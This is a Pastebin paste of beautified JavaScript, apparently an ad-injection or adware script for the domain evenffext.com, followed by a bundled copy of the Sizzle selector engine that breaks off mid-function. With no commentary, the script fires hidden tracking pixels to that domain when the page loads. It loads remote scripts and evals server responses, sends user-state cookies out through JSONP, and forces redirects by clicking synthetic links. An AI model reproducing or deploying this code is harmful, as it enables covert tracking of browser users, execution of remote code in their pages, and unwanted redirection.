Advertisement
Guest User

Untitled

a guest
Dec 27th, 2018
418
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 180.89 KB | None | 0 0
  1. (function(f, i, j) {
  2. var g = "c9f22c14a3872f280d";
  3. var b = (function() {
  4. var l = 3;
  5. var p = parseInt("0");
  6. var o = parseInt("0");
  7. (function() {
  8. var r = ["mid=", "wid=51113", "sid=", "tid=3231", "rid=LAUNCHED"];
  9. a = (window.location.protocol == "http:" ? "http:" : "https:") + "//evenffext.com/metric/?" + r.join("&");
  10. var q = f.createElement("img");
  11. q.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  12. q.src = a + (a.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  13. (document.head || document.documentElement).appendChild(q);
  14. if (typeof q.onload != j) {
  15. q.onload = function() {
  16. q.parentNode && q.parentNode.removeChild(q)
  17. }
  18. }
  19. }
  20. )();
  21. var n = false;
  22. if (typeof (MainWindow) != "undefined") {
  23. window.document = MainWindow.document.parentWindow
  24. }
  25. if (n) {
  26. return false
  27. }
  28. (function(d, w, uniqId, u) {
  29. var isReady = false
  30. , readyQueue = []
  31. , div = u
  32. , $$ = {};
  33. if (typeof (JSON) === u) {
  34. JSON = {}
  35. }
  36. function onReady() {
  37. isReady = true;
  38. while (readyQueue.length > 0) {
  39. (readyQueue.pop())()
  40. }
  41. }
  42. if (typeof (d.getElementsByClassName) == u) {
  43. d.getElementsByClassName = function(cl) {
  44. var retnode = [];
  45. var myclass = new RegExp("\\b" + cl + "\\b");
  46. var elem = this.getElementsByTagName("*");
  47. for (var i = 0; i < elem.length; i++) {
  48. var classes = elem[i].className;
  49. if (myclass.test(classes)) {
  50. retnode.push(elem[i])
  51. }
  52. }
  53. return retnode
  54. }
  55. }
  56. $$ = w[uniqId] = {
  57. l: {},
  58. isIe: !!d.attachEvent,
  59. scriptDomain: "evenffext.com",
  60. unixTimestampNow: Math.round(new Date().getTime() / 1000),
  61. optoutValue: {},
  62. limitsValue: {},
  63. currentOptoutBlock: null,
  64. monetizationsConfig: {},
  65. ready: function(callback) {
  66. !isReady ? readyQueue.push(callback) : callback()
  67. },
  68. createEl: function(html) {
  69. if (div === u) {
  70. div = d.createElement("div")
  71. }
  72. div.innerHTML = html;
  73. return div.firstChild
  74. },
  75. each: function(array, callback) {
  76. var i = 0
  77. , length = array.length;
  78. for (; i < length; ) {
  79. if (callback(array[i], i++) === false) {
  80. return true
  81. }
  82. }
  83. },
  84. inArray: function(array, e) {
  85. var i = 0
  86. , length = array.length;
  87. for (; i < length; i++) {
  88. if (e === array[i]) {
  89. return true
  90. }
  91. }
  92. return false
  93. },
  94. filter: function(array, callback) {
  95. var i = 0
  96. , length = array.length
  97. , ret = [];
  98. for (; i < length; i++) {
  99. if (callback(array[i], i)) {
  100. ret.push(array[i])
  101. }
  102. }
  103. return ret
  104. },
  105. apply: function() {
  106. var obj = {};
  107. $$.each(arguments, function(arg) {
  108. for (var i in arg) {
  109. obj[i] = arg[i]
  110. }
  111. });
  112. return obj
  113. },
  114. xhrRequest: function(xhr, o) {
  115. var timeoutId = u
  116. , isTimedout = false
  117. , $this = this;
  118. function __gacb(data) {
  119. o.callback(data)
  120. }
  121. o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "ajax";
  122. xhr.onreadystatechange = function() {
  123. if (isTimedout) {
  124. return
  125. }
  126. if (xhr.readyState === 4) {
  127. if (xhr.status === 200 && xhr.responseText) {
  128. if (timeoutId) {
  129. clearTimeout(timeoutId)
  130. }
  131. if (xhr.responseText.indexOf("__gacb(") > -1) {
  132. eval(xhr.responseText)
  133. } else {
  134. o.callback($this.fromJson(xhr.responseText))
  135. }
  136. }
  137. }
  138. }
  139. ;
  140. xhr.open("GET", o.url);
  141. xhr.withCredentials = false;
  142. timeoutId = setTimeout(function() {
  143. isTimedout = true;
  144. xhr.abort();
  145. $$.jsonpRequest(o)
  146. }, o.timeout);
  147. xhr.send()
  148. },
  149. jsonp: function(opts) {
  150. var timeoutId = u
  151. , isTimedout = false;
  152. var o = $$.apply({
  153. callback: function() {},
  154. timeout: 15000,
  155. onTimeout: function() {},
  156. data: {}
  157. }, opts || {});
  158. var r = Math.floor(Math.random() * 1000000000);
  159. var jsonpFunction = "__twb_cb_" + r;
  160. w[jsonpFunction] = function(data) {
  161. if (isTimedout) {
  162. return
  163. }
  164. if (timeoutId) {
  165. clearTimeout(timeoutId)
  166. }
  167. o.callback(data);
  168. onComplete()
  169. }
  170. ;
  171. var onComplete = function() {
  172. w[jsonpFunction] = u;
  173. if (s && s.parentNode) {
  174. s.parentNode.removeChild(s)
  175. }
  176. };
  177. o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "jsonp=" + jsonpFunction + "&" + $$.toUrlParams(o.data);
  178. var s = $$.script(o.url);
  179. timeoutId = setTimeout(function() {
  180. isTimedout = true;
  181. o.onTimeout();
  182. onComplete()
  183. }, o.timeout)
  184. },
  185. toUrlParams: function(formdata, numeric_prefix, arg_separator) {
  186. var value, key, tmp = [];
  187. var _http_build_query_helper = function(key, val, arg_separator) {
  188. var k, tmp = [];
  189. if (val === true) {
  190. val = "1"
  191. } else {
  192. if (val === false) {
  193. val = "0"
  194. }
  195. }
  196. if (val != null) {
  197. if (typeof val === "object") {
  198. for (k in val) {
  199. if (val[k] != null) {
  200. tmp.push(_http_build_query_helper(key + "[" + k + "]", val[k], arg_separator))
  201. }
  202. }
  203. return tmp.join(arg_separator)
  204. } else {
  205. if (typeof val !== "function") {
  206. return w.encodeURIComponent(key) + "=" + w.encodeURIComponent(val)
  207. } else {
  208. return ""
  209. }
  210. }
  211. } else {
  212. return ""
  213. }
  214. };
  215. if (!arg_separator) {
  216. arg_separator = "&"
  217. }
  218. for (key in formdata) {
  219. value = formdata[key];
  220. if (numeric_prefix && !isNaN(key)) {
  221. key = String(numeric_prefix) + key
  222. }
  223. var query = _http_build_query_helper(key, value, arg_separator);
  224. if (query !== "") {
  225. tmp.push(query)
  226. }
  227. }
  228. return tmp.join(arg_separator)
  229. },
  230. jsonpRequest: function(o) {
  231. var timeoutId = u
  232. , isTimedout = false;
  233. callbackName = "f" + this.randomNumber(10000, 9999999);
  234. o.url += (o.url.indexOf("?") >= 0 ? "&" : "?") + "jsonp=" + callbackName;
  235. w[callbackName] = function(data) {
  236. if (isTimedout) {
  237. return
  238. }
  239. if (timeoutId) {
  240. clearTimeout(timeoutId)
  241. }
  242. o.callback(data)
  243. }
  244. ;
  245. var s = $$.script(o.url);
  246. timeoutId = setTimeout(function() {
  247. isTimedout = true;
  248. s.parentNode.removeChild(s);
  249. o.onTimeout()
  250. }, o.timeout)
  251. },
  252. toJson: JSON.stringify || function(obj) {
  253. var t = typeof (obj);
  254. if (t != "object" || obj === null) {
  255. if (t == "string") {
  256. obj = '"' + obj + '"'
  257. }
  258. return String(obj)
  259. } else {
  260. var n, v, json = [], arr = (obj && obj.constructor == Array);
  261. for (n in obj) {
  262. v = obj[n];
  263. t = typeof (v);
  264. if (t == "string") {
  265. v = '"' + v + '"'
  266. } else {
  267. if (t == "object" && v !== null) {
  268. v = arguments.callee(v)
  269. }
  270. }
  271. json.push((arr ? "" : '"' + n + '":') + String(v))
  272. }
  273. return (arr ? "[" : "{") + String(json) + (arr ? "]" : "}")
  274. }
  275. }
  276. ,
  277. fromJson: JSON.parse || function(str) {
  278. if (str === "") {
  279. str = '""'
  280. }
  281. eval("var p=" + str + ";");
  282. return p
  283. }
  284. ,
  285. xor: function(str) {
  286. var i = 0
  287. , length = str.length
  288. , ret = "";
  289. for (; i < length; ) {
  290. ret += String.fromCharCode(77 ^ str.charCodeAt(i++))
  291. }
  292. return ret
  293. },
  294. script: function(src, nocache, attributes) {
  295. var s = d.createElement("script");
  296. s.type = "text/javascript";
  297. if (attributes) {
  298. for (var i in attributes) {
  299. s.setAttribute(i, attributes[i])
  300. }
  301. }
  302. s.src = src + (nocache === u || nocache ? (src.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime()) : "");
  303. if (d.getElementsByTagName("script") || d.documentElement.firstChild) {
  304. (d.getElementsByTagName("script")[0] || d.documentElement.firstChild).parentNode.appendChild(s)
  305. } else {
  306. if (d.getElementsByTagName("head")) {
  307. d.getElementsByTagName("head")[0].appendChild(s)
  308. } else {
  309. d.getElementsByTagName("body")[0].appendChild(s)
  310. }
  311. }
  312. return s
  313. },
  314. includeCss: function(src) {
  315. var style = d.createElement("link");
  316. if (d.getElementsByTagName("body")[0]) {
  317. d.getElementsByTagName("body")[0].appendChild(style);
  318. style.rel = "stylesheet";
  319. style.type = "text/css";
  320. style.href = src
  321. }
  322. },
  323. hasClass: function(element, className) {
  324. return (!!element.getAttribute("class") && element.getAttribute("class").indexOf(className) > -1)
  325. },
  326. addClass: function(element, className) {
  327. element.setAttribute("class", (!!element.getAttribute("class") ? element.getAttribute("class") + " " : "") + className)
  328. },
  329. removeClass: function(element, className) {
  330. if (!!element.getAttribute("class")) {
  331. element.setAttribute("class", element.getAttribute("class").replace(className, ""))
  332. }
  333. },
  334. randomNumber: function(min, max) {
  335. return Math.floor(Math.random() * max) + min
  336. },
  337. eval: function(data) {
  338. var s = d.createElement("script");
  339. s.defer = true;
  340. s.text = data;
  341. (d.getElementsByTagName("script")[0] || d.documentElement.firstChild).parentNode.appendChild(s)
  342. },
  343. on: function(el, event, fn) {
  344. var handler = function(event) {
  345. fn.call(el, event || w.event)
  346. };
  347. if (el.addEventListener) {
  348. el.addEventListener(event, handler, false)
  349. } else {
  350. if (el.attachEvent) {
  351. el.attachEvent("on" + event, handler)
  352. }
  353. }
  354. },
  355. redirect: function(url, blank) {
  356. var a = d.createElement("a");
  357. a.href = url;
  358. if (blank) {
  359. a.target = "_blank"
  360. }
  361. a.__norewrite = true;
  362. d.body.appendChild(a);
  363. a.click();
  364. d.body.removeChild(a)
  365. },
  366. setCookie: function(name, value, opts) {
  367. var o = opts || {}
  368. , expire = u;
  369. if (o.expire) {
  370. expire = new Date();
  371. expire.setTime(expire.getTime() + (o.expire * 1000))
  372. }
  373. document.cookie = encodeURIComponent(name) + "=" + encodeURIComponent(value) + (expire ? "; expires=" + expire.toUTCString() : "") + (o.path ? "; path=" + o.path : "") + (o.domain ? "; domain=" + o.domain : "")
  374. },
  375. getCookie: function(name) {
  376. var value = u;
  377. $$.each(d.cookie.split("; "), function(raw) {
  378. var parts = raw.split("=");
  379. var cookieName = decodeURIComponent(parts.shift());
  380. if (cookieName == name) {
  381. value = decodeURIComponent(parts.join("="));
  382. return false
  383. }
  384. });
  385. return value
  386. },
  387. encode: function(s) {
  388. var i = 0
  389. , ret = ""
  390. , length = s.length;
  391. for (; i < length; i++) {
  392. ret += ("%" + s.charCodeAt(i).toString(16))
  393. }
  394. return ret
  395. },
  396. preventDefault: function(e) {
  397. if (e.preventDefault) {
  398. e.preventDefault()
  399. }
  400. return e.returnValue = false
  401. },
  402. remove: function(e) {
  403. return e.parentNode && e.parentNode.removeChild(e)
  404. },
  405. attr: function(e, name) {
  406. if (e.hasAttribute && e.hasAttribute(name)) {
  407. return e.getAttribute(name)
  408. } else {
  409. var node = e.getAttributeNode(name);
  410. if (node) {
  411. return node.value
  412. }
  413. }
  414. return ""
  415. },
  416. updateLimits: function(block, lifetime) {
  417. if (!lifetime) {
  418. var mConfig = {};
  419. if (w[uniqId].monetizationsConfig && w[uniqId].monetizationsConfig[block]) {
  420. mConfig = w[uniqId].monetizationsConfig[block]
  421. }
  422. lifetime = mConfig.limit
  423. }
  424. if (lifetime > 0) {
  425. $$.limitsValue[block] = $$.unixTimestampNow + parseInt(lifetime);
  426. var cookieValue = $$.toJson($$.limitsValue);
  427. $$.jsonp({
  428. url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/limit",
  429. data: {
  430. key: "c9f22c14a3872f280d",
  431. cv: cookieValue
  432. },
  433. callback: function(response) {}
  434. })
  435. } else {}
  436. },
  437. setStartTime: function() {
  438. var cookieValue = $$.unixTimestampNow;
  439. $$.jsonp({
  440. url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/strtm",
  441. data: {
  442. key: "c9f22c14a3872f280d",
  443. cv: cookieValue
  444. },
  445. callback: function(response) {}
  446. })
  447. },
  448. updateLifeTime: function(lifeTime, lastActionTime) {
  449. if (!lastActionTime) {
  450. lastActionTime = $$.unixTimestampNow
  451. }
  452. if (!lifeTime) {
  453. lifeTime = 0
  454. }
  455. var actionDiff = $$.unixTimestampNow - lastActionTime;
  456. $$.jsonp({
  457. url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/lat",
  458. data: {
  459. key: "c9f22c14a3872f280d",
  460. cv: $$.unixTimestampNow
  461. }
  462. });
  463. if (actionDiff < 600) {
  464. var newLifeTime = parseInt(parseInt(lifeTime) + parseInt(actionDiff));
  465. $$.jsonp({
  466. url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/optout/set/lt",
  467. data: {
  468. key: "c9f22c14a3872f280d",
  469. cv: newLifeTime
  470. }
  471. })
  472. } else {}
  473. },
  474. loadedCallback: function(code, block, custom1, custom2, custom3, custom4, custom5) {
  475. if (typeof block == "undefined") {
  476. block = ""
  477. }
  478. var params = ["mid=" + block, "wid=51113", "sid=" + ((w[uniqId] && w[uniqId].tbParams && w[uniqId].tbParams.sid) ? w[uniqId].tbParams.sid : ""), "tid=3231", "rid=" + code];
  479. if (custom1) {
  480. params.push("custom1=" + custom1)
  481. }
  482. if (custom2) {
  483. params.push("custom2=" + custom2)
  484. }
  485. if (custom3) {
  486. params.push("custom3=" + custom3)
  487. }
  488. if (custom4) {
  489. params.push("custom4=" + custom4)
  490. }
  491. if (custom5) {
  492. params.push("custom5=" + custom5)
  493. }
  494. var src = (window.location.protocol == "http:" ? "http:" : "https:") + "//" + w[uniqId].scriptDomain + "/metric/?" + params.join("&");
  495. var imgEl = d.createElement("img");
  496. imgEl.setAttribute("style", "width:0;height:0;display:none;visibility:hidden;");
  497. imgEl.src = src + (src.indexOf("?") == -1 ? "?" : "&") + "t=" + (new Date().getTime());
  498. d.getElementsByTagName("body")[0].appendChild(imgEl);
  499. $$.on(imgEl, "load", function() {
  500. $$.remove(imgEl)
  501. })
  502. },
  503. reportSetCallback: function(response) {},
  504. host: function(url) {
  505. var m = url.match(/^https?:\/\/([^\/]+)/);
  506. return m ? m[1] : ""
  507. },
  508. optoutShow: function(block) {
  509. if ($$.tbParams.optoutUrl) {
  510. location.href = $$.tbParams.optoutUrl
  511. } else {
  512. if (!$$.twBarOptOut && typeof $$.twBarOptOutInit == "function") {
  513. $$.twBarOptOutInit()
  514. }
  515. if ($$.twBarOptOut) {
  516. $$.currentOptoutBlock = block;
  517. $$.twBarOptOut.style.display = "block";
  518. $$.loadedCallback("OPTOUT_SHOW", block)
  519. }
  520. }
  521. },
  522. optoutHide: function(block) {
  523. if ($$.twBarOptOut) {
  524. $$.twBarOptOut.style.display = "none"
  525. }
  526. },
  527. getMtzCfg: function(block) {
  528. var fname = ["mone", "tiza", "tions", "Config"].join("");
  529. if (w[uniqId][fname] && w[uniqId][fname][block] && w[uniqId][fname][block].config) {
  530. return w[uniqId][fname][block].config
  531. }
  532. return {}
  533. }
  534. };
  535. var getMtzConfigAlias = ["get", "Mon", "etiza", "tion", "Config"].join("");
  536. $$[getMtzConfigAlias] = function(block) {
  537. return $$.getMtzCfg(block)
  538. }
  539. ;
  540. if (d.addEventListener) {
  541. d.addEventListener("DOMContentLoaded", function() {
  542. onReady()
  543. }, false)
  544. } else {
  545. if (d.attachEvent) {
  546. d.attachEvent("onreadystatechange", function() {
  547. onReady()
  548. })
  549. }
  550. }
  551. if (d.readyState) {
  552. (function() {
  553. if ((!$$.isIe && d.readyState === "interactive") || d.readyState === "complete") {
  554. onReady()
  555. } else {
  556. setTimeout(arguments.callee, 100)
  557. }
  558. }
  559. )()
  560. } else {
  561. var toplevel = false;
  562. try {
  563. toplevel = window.frameElement == null
  564. } catch (e) {}
  565. if (d && d.dElement && d.dElement.doScroll && toplevel) {
  566. (function() {
  567. try {
  568. d.dElement.doScroll("left")
  569. } catch (e) {
  570. setTimeout(arguments.callee, 100);
  571. return
  572. }
  573. onReady()
  574. }
  575. )()
  576. }
  577. }
  578. }
  579. )(document, window, "c9f22c14a3872f280d", undefined);
  580. ;(function(aA, q) {
  581. var G, aD, l, v, R, U, ag, aH, S, aj, L, w, at, an, aB, k, P, av = "sizzle" + -(new Date()), T = aA.document, aE = 0, ao = 0, d = J(), au = J(), Q = J(), ah = false, N = function() {
  582. return 0
  583. }, az = typeof q, ab = 1 << 31, Y = ({}).hasOwnProperty, ax = [], ay = ax.pop, W = ax.push, b = ax.push, u = ax.slice, j = ax.indexOf || function(aJ) {
  584. var aI = 0
  585. , e = this.length;
  586. for (; aI < e; aI++) {
  587. if (this[aI] === aJ) {
  588. return aI
  589. }
  590. }
  591. return -1
  592. }
  593. , c = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped", x = "[\\x20\\t\\r\\n\\f]", a = "(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+", V = a.replace("w", "w#"), aq = "\\[" + x + "*(" + a + ")" + x + "*(?:([*^$|!~]?=)" + x + "*(?:(['\"])((?:\\\\.|[^\\\\])*?)\\3|(" + V + ")|)|)" + x + "*\\]", s = ":(" + a + ")(?:\\(((['\"])((?:\\\\.|[^\\\\])*?)\\3|((?:\\\\.|[^\\\\()[\\]]|" + aq.replace(3, 8) + ")*)|.*)\\)|)", z = new RegExp("^" + x + "+|((?:^|[^\\\\])(?:\\\\.)*)" + x + "+$","g"), D = new RegExp("^" + x + "*," + x + "*"), K = new RegExp("^" + x + "*([>+~]|" + x + ")" + x + "*"), al = new RegExp(x + "*[+~]"), B = new RegExp("=" + x + "*([^\\]'\"]*)" + x + "*\\]","g"), ad = new RegExp(s), ae = new RegExp("^" + V + "$"), am = {
  594. ID: new RegExp("^#(" + a + ")"),
  595. CLASS: new RegExp("^\\.(" + a + ")"),
  596. TAG: new RegExp("^(" + a.replace("w", "w*") + ")"),
  597. ATTR: new RegExp("^" + aq),
  598. PSEUDO: new RegExp("^" + s),
  599. CHILD: new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + x + "*(even|odd|(([+-]|)(\\d*)n|)" + x + "*(?:([+-]|)" + x + "*(\\d+)|))" + x + "*\\)|)","i"),
  600. bool: new RegExp("^(?:" + c + ")$","i"),
  601. needsContext: new RegExp("^" + x + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" + x + "*((?:-\\d)?\\d*)" + x + "*\\)|)(?=[^-]|$)","i")
  602. }, aa = /^[^{]+\{\s*\[native \w/, ac = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/, h = /^(?:input|select|textarea|button)$/i, t = /^h\d$/i, X = /'|\\/g, A = new RegExp("\\\\([\\da-f]{1,6}" + x + "?|(" + x + ")|.)","ig"), ap = function(e, aJ, i) {
  603. var aI = "0x" + aJ - 65536;
  604. return aI !== aI || i ? aJ : aI < 0 ? String.fromCharCode(aI + 65536) : String.fromCharCode(aI >> 10 | 55296, aI & 1023 | 56320)
  605. };
  606. try {
  607. b.apply((ax = u.call(T.childNodes)), T.childNodes);
  608. ax[T.childNodes.length].nodeType
  609. } catch (M) {
  610. b = {
  611. apply: ax.length ? function(i, e) {
  612. W.apply(i, u.call(e))
  613. }
  614. : function(aK, aJ) {
  615. var e = aK.length
  616. , aI = 0;
  617. while ((aK[e++] = aJ[aI++])) {}
  618. aK.length = e - 1
  619. }
  620. }
  621. }
  622. function E(aP, aI, aT, aV) {
  623. var aU, aM, aN, aR, aS, aL, aK, e, aJ, aQ;
  624. if ((aI ? aI.ownerDocument || aI : T) !== L) {
  625. aj(aI)
  626. }
  627. aI = aI || L;
  628. aT = aT || [];
  629. if (!aP || typeof aP !== "string") {
  630. return aT
  631. }
  632. if ((aR = aI.nodeType) !== 1 && aR !== 9) {
  633. return []
  634. }
  635. if (at && !aV) {
  636. if ((aU = ac.exec(aP))) {
  637. if ((aN = aU[1])) {
  638. if (aR === 9) {
  639. aM = aI.getElementById(aN);
  640. if (aM && aM.parentNode) {
  641. if (aM.id === aN) {
  642. aT.push(aM);
  643. return aT
  644. }
  645. } else {
  646. return aT
  647. }
  648. } else {
  649. if (aI.ownerDocument && (aM = aI.ownerDocument.getElementById(aN)) && P(aI, aM) && aM.id === aN) {
  650. aT.push(aM);
  651. return aT
  652. }
  653. }
  654. } else {
  655. if (aU[2]) {
  656. b.apply(aT, aI.getElementsByTagName(aP));
  657. return aT
  658. } else {
  659. if ((aN = aU[3]) && aD.getElementsByClassName && aI.getElementsByClassName) {
  660. b.apply(aT, aI.getElementsByClassName(aN));
  661. return aT
  662. }
  663. }
  664. }
  665. }
  666. if (aD.qsa && (!an || !an.test(aP))) {
  667. e = aK = av;
  668. aJ = aI;
  669. aQ = aR === 9 && aP;
  670. if (aR === 1 && aI.nodeName.toLowerCase() !== "object") {
  671. aL = p(aP);
  672. if ((aK = aI.getAttribute("id"))) {
  673. e = aK.replace(X, "\\$&")
  674. } else {
  675. aI.setAttribute("id", e)
  676. }
  677. e = "[id='" + e + "'] ";
  678. aS = aL.length;
  679. while (aS--) {
  680. aL[aS] = e + o(aL[aS])
  681. }
  682. aJ = al.test(aP) && aI.parentNode || aI;
  683. aQ = aL.join(",")
  684. }
  685. if (aQ) {
  686. try {
  687. b.apply(aT, aJ.querySelectorAll(aQ));
  688. return aT
  689. } catch (aO) {} finally {
  690. if (!aK) {
  691. aI.removeAttribute("id")
  692. }
  693. }
  694. }
  695. }
  696. }
  697. return aC(aP.replace(z, "$1"), aI, aT, aV)
  698. }
  699. function O(e) {
  700. return aa.test(e + "")
  701. }
  702. function J() {
  703. var i = [];
  704. function e(aI, aJ) {
  705. if (i.push(aI += " ") > v.cacheLength) {
  706. delete e[i.shift()]
  707. }
  708. return (e[aI] = aJ)
  709. }
  710. return e
  711. }
  712. function r(e) {
  713. e[av] = true;
  714. return e
  715. }
  716. function m(i) {
  717. var aJ = L.createElement("div");
  718. try {
  719. return !!i(aJ)
  720. } catch (aI) {
  721. return false
  722. } finally {
  723. if (aJ.parentNode) {
  724. aJ.parentNode.removeChild(aJ)
  725. }
  726. aJ = null
  727. }
  728. }
  729. function aF(e, aJ, aM) {
  730. e = e.split("|");
  731. var aL, aI = e.length, aK = aM ? null : aJ;
  732. while (aI--) {
  733. if (!(aL = v.attrHandle[e[aI]]) || aL === aJ) {
  734. v.attrHandle[e[aI]] = aK
  735. }
  736. }
  737. }
  738. function Z(i, e) {
  739. var aI = i.getAttributeNode(e);
  740. return aI && aI.specified ? aI.value : i[e] === true ? e.toLowerCase() : null
  741. }
  742. function H(i, e) {
  743. return i.getAttribute(e, e.toLowerCase() === "type" ? 1 : 2)
  744. }
  745. function C(e) {
  746. if (e.nodeName.toLowerCase() === "input") {
  747. return e.defaultValue
  748. }
  749. }
  750. function f(i, e) {
  751. var aJ = e && i
  752. , aI = aJ && i.nodeType === 1 && e.nodeType === 1 && (~e.sourceIndex || ab) - (~i.sourceIndex || ab);
  753. if (aI) {
  754. return aI
  755. }
  756. if (aJ) {
  757. while ((aJ = aJ.nextSibling)) {
  758. if (aJ === e) {
  759. return -1
  760. }
  761. }
  762. }
  763. return i ? 1 : -1
  764. }
  765. function F(e) {
  766. return function(aI) {
  767. var i = aI.nodeName.toLowerCase();
  768. return i === "input" && aI.type === e
  769. }
  770. }
  771. function g(e) {
  772. return function(aI) {
  773. var i = aI.nodeName.toLowerCase();
  774. return (i === "input" || i === "button") && aI.type === e
  775. }
  776. }
  777. function ar(e) {
  778. return r(function(i) {
  779. i = +i;
  780. return r(function(aI, aM) {
  781. var aK, aJ = e([], aI.length, i), aL = aJ.length;
  782. while (aL--) {
  783. if (aI[(aK = aJ[aL])]) {
  784. aI[aK] = !(aM[aK] = aI[aK])
  785. }
  786. }
  787. })
  788. })
  789. }
  790. U = E.isXML = function(e) {
  791. var i = e && (e.ownerDocument || e).documentElement;
  792. return i ? i.nodeName !== "HTML" : false
  793. }
  794. ;
  795. aD = E.support = {};
  796. aj = E.setDocument = function(e) {
  797. var i = e ? e.ownerDocument || e : T;
  798. if (i === L || i.nodeType !== 9 || !i.documentElement) {
  799. return L
  800. }
  801. L = i;
  802. w = i.documentElement;
  803. at = !U(i);
  804. aD.attributes = m(function(aI) {
  805. aI.innerHTML = "<a href='#'></a>";
  806. aF("type|href|height|width", H, aI.firstChild.getAttribute("href") === "#");
  807. aF(c, Z, aI.getAttribute("disabled") == null);
  808. aI.className = "i";
  809. return !aI.getAttribute("className")
  810. });
  811. aD.input = m(function(aI) {
  812. aI.innerHTML = "<input>";
  813. aI.firstChild.setAttribute("value", "");
  814. return aI.firstChild.getAttribute("value") === ""
  815. });
  816. aF("value", C, aD.attributes && aD.input);
  817. aD.getElementsByTagName = m(function(aI) {
  818. aI.appendChild(i.createComment(""));
  819. return !aI.getElementsByTagName("*").length
  820. });
  821. aD.getElementsByClassName = m(function(aI) {
  822. aI.innerHTML = "<div class='a'></div><div class='a i'></div>";
  823. aI.firstChild.className = "i";
  824. return aI.getElementsByClassName("i").length === 2
  825. });
  826. aD.getById = m(function(aI) {
  827. w.appendChild(aI).id = av;
  828. return !i.getElementsByName || !i.getElementsByName(av).length
  829. });
  830. if (aD.getById) {
  831. v.find.ID = function(aK, aJ) {
  832. if (typeof aJ.getElementById !== az && at) {
  833. var aI = aJ.getElementById(aK);
  834. return aI && aI.parentNode ? [aI] : []
  835. }
  836. }
  837. ;
  838. v.filter.ID = function(aJ) {
  839. var aI = aJ.replace(A, ap);
  840. return function(aK) {
  841. return aK.getAttribute("id") === aI
  842. }
  843. }
  844. } else {
  845. delete v.find.ID;
  846. v.filter.ID = function(aJ) {
  847. var aI = aJ.replace(A, ap);
  848. return function(aL) {
  849. var aK = typeof aL.getAttributeNode !== az && aL.getAttributeNode("id");
  850. return aK && aK.value === aI
  851. }
  852. }
  853. }
  854. v.find.TAG = aD.getElementsByTagName ? function(aI, aJ) {
  855. if (typeof aJ.getElementsByTagName !== az) {
  856. return aJ.getElementsByTagName(aI)
  857. }
  858. }
  859. : function(aI, aM) {
  860. var aN, aL = [], aK = 0, aJ = aM.getElementsByTagName(aI);
  861. if (aI === "*") {
  862. while ((aN = aJ[aK++])) {
  863. if (aN.nodeType === 1) {
  864. aL.push(aN)
  865. }
  866. }
  867. return aL
  868. }
  869. return aJ
  870. }
  871. ;
  872. v.find.CLASS = aD.getElementsByClassName && function(aJ, aI) {
  873. if (typeof aI.getElementsByClassName !== az && at) {
  874. return aI.getElementsByClassName(aJ)
  875. }
  876. }
  877. ;
  878. aB = [];
  879. an = [];
  880. if ((aD.qsa = O(i.querySelectorAll))) {
  881. m(function(aI) {
  882. aI.innerHTML = "<select><option selected=''></option></select>";
  883. if (!aI.querySelectorAll("[selected]").length) {
  884. an.push("\\[" + x + "*(?:value|" + c + ")")
  885. }
  886. if (!aI.querySelectorAll(":checked").length) {
  887. an.push(":checked")
  888. }
  889. });
  890. m(function(aJ) {
  891. var aI = i.createElement("input");
  892. aI.setAttribute("type", "hidden");
  893. aJ.appendChild(aI).setAttribute("t", "");
  894. if (aJ.querySelectorAll("[t^='']").length) {
  895. an.push("[*^$]=" + x + "*(?:''|\"\")")
  896. }
  897. if (!aJ.querySelectorAll(":enabled").length) {
  898. an.push(":enabled", ":disabled")
  899. }
  900. aJ.querySelectorAll("*,:x");
  901. an.push(",.*:")
  902. })
  903. }
  904. if ((aD.matchesSelector = O((k = w.webkitMatchesSelector || w.mozMatchesSelector || w.oMatchesSelector || w.msMatchesSelector)))) {
  905. m(function(aI) {
  906. aD.disconnectedMatch = k.call(aI, "div");
  907. k.call(aI, "[s!='']:x");
  908. aB.push("!=", s)
  909. })
  910. }
  911. an = an.length && new RegExp(an.join("|"));
  912. aB = aB.length && new RegExp(aB.join("|"));
  913. P = O(w.contains) || w.compareDocumentPosition ? function(aJ, aI) {
  914. var aL = aJ.nodeType === 9 ? aJ.documentElement : aJ
  915. , aK = aI && aI.parentNode;
  916. return aJ === aK || !!(aK && aK.nodeType === 1 && (aL.contains ? aL.contains(aK) : aJ.compareDocumentPosition && aJ.compareDocumentPosition(aK) & 16))
  917. }
  918. : function(aJ, aI) {
  919. if (aI) {
  920. while ((aI = aI.parentNode)) {
  921. if (aI === aJ) {
  922. return true
  923. }
  924. }
  925. }
  926. return false
  927. }
  928. ;
  929. aD.sortDetached = m(function(aI) {
  930. return aI.compareDocumentPosition(i.createElement("div")) & 1
  931. });
  932. N = w.compareDocumentPosition ? function(aJ, aI) {
  933. if (aJ === aI) {
  934. ah = true;
  935. return 0
  936. }
  937. var aK = aI.compareDocumentPosition && aJ.compareDocumentPosition && aJ.compareDocumentPosition(aI);
  938. if (aK) {
  939. if (aK & 1 || (!aD.sortDetached && aI.compareDocumentPosition(aJ) === aK)) {
  940. if (aJ === i || P(T, aJ)) {
  941. return -1
  942. }
  943. if (aI === i || P(T, aI)) {
  944. return 1
  945. }
  946. return S ? (j.call(S, aJ) - j.call(S, aI)) : 0
  947. }
  948. return aK & 4 ? -1 : 1
  949. }
  950. return aJ.compareDocumentPosition ? -1 : 1
  951. }
  952. : function(aJ, aI) {
  953. var aP, aM = 0, aO = aJ.parentNode, aL = aI.parentNode, aK = [aJ], aN = [aI];
  954. if (aJ === aI) {
  955. ah = true;
  956. return 0
  957. } else {
  958. if (!aO || !aL) {
